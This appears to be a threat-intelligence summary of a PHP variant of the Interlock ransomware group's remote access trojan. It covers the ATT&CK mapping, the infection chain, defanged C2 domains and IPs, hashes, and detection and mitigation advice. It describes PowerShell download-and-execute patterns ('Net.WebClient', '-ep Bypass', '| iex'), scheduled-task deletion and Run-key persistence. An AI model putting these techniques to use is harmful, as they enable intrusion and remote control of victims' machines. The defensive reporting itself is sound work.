Full Report
Researchers from The DFIR Report, in partnership with Proofpoint, have identified a new and resilient variant of the Interlock ransomware group’s remote access trojan (RAT). This new malware, a shift … Read More
Analysis Summary
# Tool/Technique: Interlock RAT (PHP Variant)
## Overview
A new, resilient variant of the Remote Access Trojan (RAT) used by the Interlock ransomware group. This iteration shifts from previous JavaScript/Node.js implementations to utilize PHP, indicating operational evolution, often seen in conjunction with the LandUpdate808 (KongTuke) web-inject threat clusters.
## Technical Details
- Type: Malware family (Remote Access Trojan - RAT)
- Platform: Windows (implied by execution using `powershell.exe`, `schtasks`, and targeting Windows registry)
- Capabilities: Initial access, system reconnaissance, persistence mechanisms, and execution of further payloads/commands via PowerShell.
- First Seen: June 2025 campaigns.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- TA0007 - Discovery
- T1082 - System Information Discovery
- T1057 - Process Discovery
- T1012 - Query Registry
- T1049 - System Network Connections Discovery
- TA0003 - Persistence
- T1547.001 - Registry Run Keys / Startup Folder
- TA0008 - Lateral Movement
- T1021 - Remote Services
- T1021.001 - Remote Desktop Protocol (RDP)
## Functionality
### Core Capabilities
- **Execution Chain:** Leverages compromised websites injecting scripts, leading to user interaction (fake CAPTCHA/verification), executing obfuscated PowerShell commands that ultimately invoke a locally staged PHP executable (`php.exe` from `AppData\Roaming`).
- **Configuration Loading:** The PHP executable is called with specific directives (`-d extension=zip`) and loaded a configuration file (`.cfg`).
- **System Discovery (Automated):** Executes extensive PowerShell commands to gather system profile data, including `systeminfo`, running processes/services (`tasklist`, `Get-Service`), mounted drives (`Get-PSDrive`), and network neighborhood data (`Get-NetNeighbor`).
- **Privilege Determination:** Checks local privilege level (USER, ADMIN, or SYSTEM).
### Advanced Features
- **Interactive/Hands-on-Keyboard Discovery:** Commands suggest the RAT supports interactive C2 sessions, potentially for manual discovery beyond automated scripts.
- **Persistence:** Attempts to establish persistence via the Windows Registry Run key (`HKCU\Software\Microsoft\Windows\CurrentVersion\Run`).
- **Lateral Movement:** Observed utilizing Remote Desktop Protocol (RDP) for movement within victim environments.
- **Tool Chaining:** In some observed instances, the PHP variant subsequently deploys the Node.js variant of the Interlock RAT, demonstrating modularity.
- **Payload Delivery Command:** Initial execution involved a command to delete scheduled tasks (`schtasks /delete /tn Updater /f`) and downloading/executing a script via PowerShell's `Net.WebClient` from a specific URL.
## Indicators of Compromise
- File Hashes:
- SHA256: `28a9982cf2b4fc53a1545b6ed0d0c1788ca9369a847750f5652ffa0ca7f7b7d3` (Config File)
- SHA256: `8afd6c0636c5d70ac0622396268786190a428635e9cf28ab23add939377727b0` (Config File)
- File Names:
- Configuration files named `wefs.cfg` potentially referenced, or generic `config.cfg`.
- The PHP executable is staged in `C:\Users\[REDACTED]\AppData\Roaming\php\php.exe`.
- Registry Keys:
- Persistence Registry Entry Example: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` targeting the staged `php.exe`.
- Network Indicators:
- C2 Domains (TryCloudflare hosted):
- `deadly-programming-attorneys-our[.]trycloudflare[.]com` (Used in initial download via PowerShell URI)
- `existed-bunch-balance-councils[.]trycloudflare[.]com`
- `ferrari-rolling-facilities-lounge[.]trycloudflare[.]com`
- `galleries-physicians-psp-wv[.]trycloudflare[.]com`
- `evidence-deleted-procedure-bringing[.]trycloudflare[.]com`
- `nowhere-locked-manor-hs[.]trycloudflare[.]com`
- `ranked-accordingly-ab-hired[.]trycloudflare[.]com`
- Fallback IPs:
- `64[.]95[.]12[.]71`
- `184[.]95[.]51[.]165`
- Behavioral Indicators:
- Spawning of `php.exe` from an unusual location (`AppData\Roaming`).
- Use of PowerShell (`-ep Bypass -w H`) to execute remote content (`| iex`).
- Execution of multiple PowerShell cmdlets for system discovery via `cmd.exe /s /c "powershell -c ..."`.
## Associated Threat Actors
- Interlock Ransomware Group
- Associated with LandUpdate808 (KongTuke) web-inject activity.
## Detection Methods
- Signature-based detection: YARA rules available via The DFIR Report Intel platform (for registered customers).
- Behavioral detection: Monitoring for execution of PowerShell with common obfuscation or download/execute patterns, especially those spawning processes like `php.exe` from non-standard directories. Detection of suspicious scheduled task/registry modifications (`schtasks /delete`, Run key creation).
- YARA rules: Mentioned as available for customers.
## Mitigation Strategies
- Prevention: Strong web filtering and ensuring website owners patch vulnerabilities leading to initial web-injects (KongTuke).
- Hardening recommendations: Implement application control to restrict executable use from user profile directories like `AppData\Roaming`.
- Network segmentation and monitoring RDP usage for unauthorized access.
- Restrict PowerShell execution policies where possible and monitor command-line arguments for suspicious URI downloads/execution.
## Related Tools/Techniques
- Interlock RAT (Node.js variant, aka NodeSnake)
- KongTuke/LandUpdate808 web-inject delivery mechanism.
- JavaScript-based initial stage malware.